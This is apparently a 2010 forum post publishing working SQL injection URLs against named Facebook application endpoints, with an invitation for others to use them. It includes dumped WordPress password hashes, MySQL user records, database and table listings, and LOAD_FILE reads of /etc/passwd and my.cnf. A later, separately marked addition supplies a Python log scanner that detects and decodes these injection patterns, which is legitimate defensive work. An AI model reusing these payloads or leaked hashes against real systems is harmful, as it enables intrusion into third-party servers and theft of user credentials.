Facebook Server SQL Injection

By ShowTime

16 Jun 2010
Hello, my commanders and subordinates. I can't quite remember, but a few days ago in a thread I said that I could hack Facebook if I wanted to. I didn't hack it, but I found its SQL vulnerabilities, and now I'm publishing them; anyone who wants to go ahead has my permission.



;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz

###############
# INFORMATION #
###############
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
[email protected]
politicsapp
5.0.45-log

;===== TABLES

# astro
** app
** oscache
** user


# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan

# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users

# countdownapp
** oscache
** user

# crush
** couple
** oscache
** user

# dare
** flag
** game
** item
** user

# friendiq
** oscache
** score
** user

# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user

# hookup
** couple
** neverblue
** oscache
** user

# jauntlet
** user

# loccus
** checkin
** oscache
** user

# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# maps
** place
** user

# martisor
** user

# mediax
** oscache
** user

# mostlikely
** callback
** statement
** statementforuser
** user

# music
** itemforuser
** oscache
** user

# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle

# plans
** attend
** cache
** event
** place
** user

# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user

# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user

# pwnfriends
** photo
** photoforfriend
** photoforuser
** user

# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user

# seeall
** network
** networkforuser
** test2
** userpref

# send
** app
** item
** itemforuser
** neverblue
** user

# supporter
** oscache
** user

# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user

# tomsapps
** ad
** adclick
** app
** contest
** notification

# travelbug
** bug
** bugcache
** user

# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user

# wikitravel
** badmap
** wikitravelimage
** wikitravelpage


---------------------------------------------------------------------------------------------------------------------------------------------------

load_file = yes magic_quotes = off


  • Gathering MySQL Server Configuration...
Database: facebook
User: root@localhost
Version: 5.1.37-1ubuntu5.4


  • Do we have Access to MySQL Database: YES <-- w00t w00t
  • Dumping MySQL user info. user:password:host
  • Number of users in the mysql.user table: 4
    [0] root::localhost
    [1] root::ip-10-128-57-239
    [2] root::127.0.0.1
    [3] debian-sys-maint:*79E5005DD3B60F9100ACF7571D5DC9079388F408:localhost

  • Do we have Access to Load_File: YES <-- w00t w00t
  • Starting Load_File Fuzzer...
  • Number of tables names to be fuzzed: 236
    [!] Found /etc/passwd
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    [!] Found /etc/hosts
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    [!] Found /etc/mysql/my.cnf
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    [!] Found /etc/group
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
 
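A detection-side counterpart, added here and not part of the post: a small access-log scanner that flags the idioms every URL above depends on (UNION SELECT, information_schema, LOAD_FILE, the "and 1=2" that empties the legitimate result set) and decodes the 0x.. hex literals and CHAR() lists the post uses in place of quoted strings, so an analyst sees that 0x6d7973716c is 'mysql' and the attacker was enumerating every non-system schema. The log lines are constructed for the demo; the request paths in them are the post's own, with the long column lists shortened. analyze, scan and decode_literals are hypothetical names.

```python
"""Flag and decode the MySQL injection URLs from the post in access logs.

Added example, not from the original post.  LOG_LINES are constructed;
the request paths are the post's, with column lists shortened.
"""
import re
from typing import Optional
from urllib.parse import unquote_plus

LOG_LINES = [
    '10.0.0.5 - - [16/Jun/2010:12:00:01 +0000] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1 HTTP/1.1" 200 812',
    '10.0.0.5 - - [16/Jun/2010:12:00:02 +0000] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=+0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1 HTTP/1.1" 200 4120',
    '10.0.0.5 - - [16/Jun/2010:12:00:03 +0000] "GET /myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE(\'/etc/passwd\'),7,8,9,10-- HTTP/1.1" 200 2210',
    '10.0.0.9 - - [16/Jun/2010:12:00:04 +0000] "GET /politicalaction/issue.php?issueid=7 HTTP/1.1" 200 640',
]

# Idioms the post's payloads rely on; case-insensitive because the second
# target was hit with 'UnIoN aLL SeLeCt', and whitespace-tolerant because
# '+' decodes to a space.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "tautology_flip": re.compile(r"\b(?:and|or)\s+1\s*=\s*[12]\b", re.I),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")   # 0x6d7973716c
CHAR_LIST = re.compile(r"\bchar\(([\d\s,]+)\)", re.I)   # CHAR(32,58,32)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_literals(query: str) -> dict:
    """Map each quote-free string literal in the query to its decoded text."""
    decoded = {}
    for m in HEX_LITERAL.finditer(query):
        hexdigits = m.group(1)
        if len(hexdigits) % 2:
            continue  # odd length cannot be a MySQL hex string literal
        try:
            decoded["0x" + hexdigits] = bytes.fromhex(hexdigits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # a hex number, not printable text
    for m in CHAR_LIST.finditer(query):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded[m.group(0)] = "".join(chr(c) for c in codes)
    return decoded


def analyze(line: str) -> Optional[dict]:
    """One access-log line -> finding dict, or None when nothing matched."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = unquote_plus(m.group(1))  # '+' -> ' ', %XX -> byte
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(url))
    if not hits:
        return None
    return {"url": url, "signatures": hits, "literals": decode_literals(url)}


def scan(lines) -> list:
    """Run analyze() over every line and keep only the suspicious ones."""
    return [f for f in (analyze(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding["signatures"], finding["literals"])
```

Decoding the literals is the part an analyst actually needs: the second URL reads as `table_schema != 'mysql' AND table_schema != 'information_schema'`, i.e. a dump of every application schema on the shared server, which matches the long table list in the post, and CHAR(32,58,32) is just the ' : ' separator used to pretty-print user(), database() and version().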
